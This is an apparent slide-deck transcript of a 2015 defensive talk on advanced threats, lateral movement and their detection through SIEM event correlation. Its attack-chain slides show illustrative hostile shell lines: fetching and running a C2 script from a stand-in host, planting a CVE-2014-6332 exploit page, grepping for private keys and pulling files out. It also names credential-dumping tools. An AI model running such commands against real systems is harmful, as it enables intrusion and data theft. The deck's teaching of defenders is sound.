Advanced Threats and Lateral Movement Detection
4 likes1,236 views
The document discusses advanced threats in cybersecurity, emphasizing the methods used by threat actors such as phishing and lateral movement to infiltrate organizations. It highlights the importance of event correlation, anomaly detection, and behavioral analytics in identifying and responding to these threats. Additionally, it provides insights into effective defensive strategies and the necessity of understanding organizational environments to mitigate risks from cyber attacks.
![#
man
[Advanced
Threats]
• Advanced
Persistent
Threats
• Organized
Cyber
Crime
• Hack5vists
• ‘Cyber
Terrorists’
• Etc…
• Able
to
develop
and
uElize
sophisEcated
techniques
in
pursuit
of
their
target
objecEve
from
reconnaissance
to
data
exfiltraEon.
• Will
leverage
the
full
spectrum
of
aWack
vectors
–
social,
technical,
physical,
etc.
• Highly
organized,
highly
moEvated,
highly
resourced.
• Willing
to
invest
significant
Eme
and
resources
to
compromise.
5](https://image.slidesharecdn.com/adv-threats-2015-150815160201-lva1-app6892/85/Advanced-Threats-and-Lateral-Movement-Detection-5-320.jpg)
![#
cat
[cve-‐2014-‐6332]
>>
/var/www/pwn-‐IE.html
15](https://image.slidesharecdn.com/adv-threats-2015-150815160201-lva1-app6892/85/Advanced-Threats-and-Lateral-Movement-Detection-15-320.jpg)
![Thank
You!
38
QUESTIONS?
Greg
Foss
OSCP,
GAWN,
GPEN,
GWAPT,
GCIH,
CEH
Senior
Security
Research
Engineer
Greg.Foss[at]logrhythm.com
@heinzarelli](https://image.slidesharecdn.com/adv-threats-2015-150815160201-lva1-app6892/85/Advanced-Threats-and-Lateral-Movement-Detection-38-320.jpg)
Advanced Threats and Lateral Movement Detection
- 1. Advanced Threats & Lateral Movement Detec5on Greg Foss OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Sr. Security Research Engineer LogRhythm Labs
- 2. # whoami • Greg Foss • Sr. Security Researcher • LogRhythm Labs – Threat Intel Team • Former DOE PenetraEon Tester • Focus => Honeypots, Incident Response, and Red Team • OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc… 2
- 3. # ls -‐lha IT Security Threats Event CorrelaEon DetecEon DEMO! 1 2 3 4 3
- 4. 4
- 5. # man [Advanced Threats] • Advanced Persistent Threats • Organized Cyber Crime • Hack5vists • ‘Cyber Terrorists’ • Etc… • Able to develop and uElize sophisEcated techniques in pursuit of their target objecEve from reconnaissance to data exfiltraEon. • Will leverage the full spectrum of aWack vectors – social, technical, physical, etc. • Highly organized, highly moEvated, highly resourced. • Willing to invest significant Eme and resources to compromise. 5
- 6. It’s when, not if… • Mission Oriented • Persistent an Driven • PaEent and Methodical • Focus on exponenEal ROI • Emphasis on high IP value targets • They will get in… 6 Image: hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg
- 7. Iden5fy a ‘Hacker’ 7
- 8. Ok, for real… • *Simple… Correlate on odd network / host ac5vity • Use the data at hand to acEvely detect anomalies • Understand how your organizaEon will respond to a breach / outage / squirrel affecEng any of the three InfoSec pillars • Confiden5ality • Integrity • Availability 8
- 9. Advanced Threat Tac5cs and Evasion • Threat actors of all types move slowly and quietly over Eme. LimiEng exposure and potenEal for discovery. • Trending on enterprise data over Eme helps to build baselines that can be used to ac5vely iden5fy anomalies. 9
- 10. IT Security Threats 10
- 11. # last && echo ‘How are they geYng in??’ • Phishing • 91% of ‘advanced’ aWacks began with a phishing email or similar social engineering tacEcs. • hWp://www.infosecurity-‐magazine.com/view/29562/91-‐of-‐apt-‐aWacks-‐ start-‐with-‐a-‐spearphishing-‐email/ • 2014 Metrics • Average cost per breach => $3.5 million • 15% Higher than the previous year • hWp://www.ponemon.org/blog/ponemon-‐insEtute-‐releases-‐2014-‐cost-‐ of-‐data-‐breach-‐global-‐analysis 11
- 12. # last && echo ‘How are they geYng in??’ • Phishing • 91% of ‘advanced’ aWacks began with a phishing email or similar social engineering tacEcs. • hWp://www.infosecurity-‐magazine.com/view/29562/91-‐of-‐apt-‐aWacks-‐ start-‐with-‐a-‐spearphishing-‐email/ • 2014 Metrics • Average cost per breach => $3.5 million • 15% Higher than the previous year • hWp://www.ponemon.org/blog/ponemon-‐insEtute-‐releases-‐2014-‐cost-‐ of-‐data-‐breach-‐global-‐analysis 12
- 13. # history | more • It only takes one… 13
- 14. # ./searchsploit ‘client side’ && echo ‘new exploits daily!’ 14
- 15. # cat [cve-‐2014-‐6332] >> /var/www/pwn-‐IE.html 15
- 16. Event Correla5on & Detec5on 16
- 17. Defense in Depth 17
- 19. Phishing Aback Log Traces 19
- 20. $ vim next.sh • Maintain Access… 20 Image: hWp://www.netresec.com/images/back_door_open_300x200.png
- 21. $ ./next.sh • Then? • *Nothing… • For a long Eme… • *not really* • They have aWained a foothold and are now your newest employees… 21
- 22. $ su -‐ root 22
- 23. # wget hbp://bad.stuff.net/c2.py . && ./c2.py • Once infected, the beachhead will beacon periodically 23
- 24. Behavioral Analy5cs • Beaconing Ac5vity – Usually iniEated over port 443 or an encrypted tunnel over port 80. • Can be detected with a Firewall or Web Proxy • Capability to decrypt SSL traffic is a huge plus • Behavioral analy5cs can be uElized to differenEate normal browsing acEvity from possible evidence of an infected host. • Using a SIEM, track the unique websites usually visited, and the overall volume of normal web acEvity, on a per user and a per host basis. • Watch for significant changes over an extended period of Eme. 24
- 25. Reconnaissance • Ping sweeps, service discovery, etc. – NO • Why make unnecessary noise? • Instead => access network shares, web apps, and services • Passively gather informaEon using available resources… 25 Image: hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png
- 26. Lateral Movement • Dump Local System Hashes • Maybe crack them, maybe it’s not even necessary… • Pass the Hash (PtH) • Dump plain text passwords • Mimikatz -‐-‐ FTW! • Act as an internal employee -‐-‐ use legiEmate means to access resources. 26
- 27. Uncovering Internal Reconnaissance and Pivo5ng • Security OperaEons Goal => Reduce MTTD and MTTR • MTTD – Mean Time to Detect • MTTR – Mean Time to Respond • Set Traps => Honeypot / Honey Token access • Overt Clues => ModificaEon of user / file / group permissions and pivoEng evidence • Subtle Clues => VPN access from disparate geographical locaEons • Missed Opportuni5es => Once inside, they are now an ‘employee’… 27
- 28. Lateral Movement Log Traces • Microsos’s granular Event IdenEficaEon schema (EVID) in conjuncEon with environment informaEon provides analysts with plenty of informaEon to track aWackers once they have breached the perimeter. 28
- 29. Passive Data Extrac5on • Well Poisoning via UNC Paths • SMB Replay • Help Desk Tickets • Responder – By Spider Labs • Keylogging 29
- 30. Passive Traffic Analysis • Analyze / capture anything that comes across the wire. • ARP poison hosts of interest, take over switches/routers, etc. 30 Image: hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/
- 31. # grep –rhi ‘private key’ /* && echo “Iden5fy Key Resources” • Keys / CerEficates / Passwords • File Shares and Databases • Intellectual Property • Domain Controllers / Exchange / etc. • Business Leaders – CXO, Director, VP, etc. • AdministraEve Assistants 31 Image: hWp://www.mobilemarkeEngwatch.com/wordpress/wp-‐content/uploads/2011/07/Top-‐Secret-‐Tip-‐To-‐Pick-‐SMS-‐Keyword.jpeg
- 32. # wget hbp://target/files.tgz && echo “Data Exfiltra5on” • Target data idenEfied, gathered, and moved out of the environment. • Data is normally leaked in a ‘hidden’ or modified format, rarely is the actual document extracted. • Emails and Employee PII • Intellectual Property • Trade Secrets 32 Image: hWp://www.csee.umbc.edu/wp-‐content/uploads/2013/04/ex.jpg
- 33. Data Exfiltra5on is Open Not ‘Advanced’ 33
- 34. Catching Data Exfiltra5on • Granular restric5ons on sensi5ve files and directories to specific groups or individuals, alert on any abnormal file access / read / write / etc. • DNS exfiltra5on or someEmes even ICMP Tunneling in high security environments • Non-‐SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080 • Abnormal web server ac5vity, newly created files, etc. 34
- 35. It all comes down to Event Correla5on 35
- 36. DEMO 36 DEMO
- 37. Closing Thoughts… • Don’t be hard on the outside, sos and chewy on the inside… • Implement Layer 3 (network) SegmentaEon and Least User Privilege • Understand your environment and log data so that you can accurately correlate physical and cyber events • Implement URL filtering, stateful packet inspecEon, and binary analysis • AcEvely alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment • The earlier you can detect aWackers the beWer… 37
- 38. Thank You! 38 QUESTIONS? Greg Foss OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Senior Security Research Engineer Greg.Foss[at]logrhythm.com @heinzarelli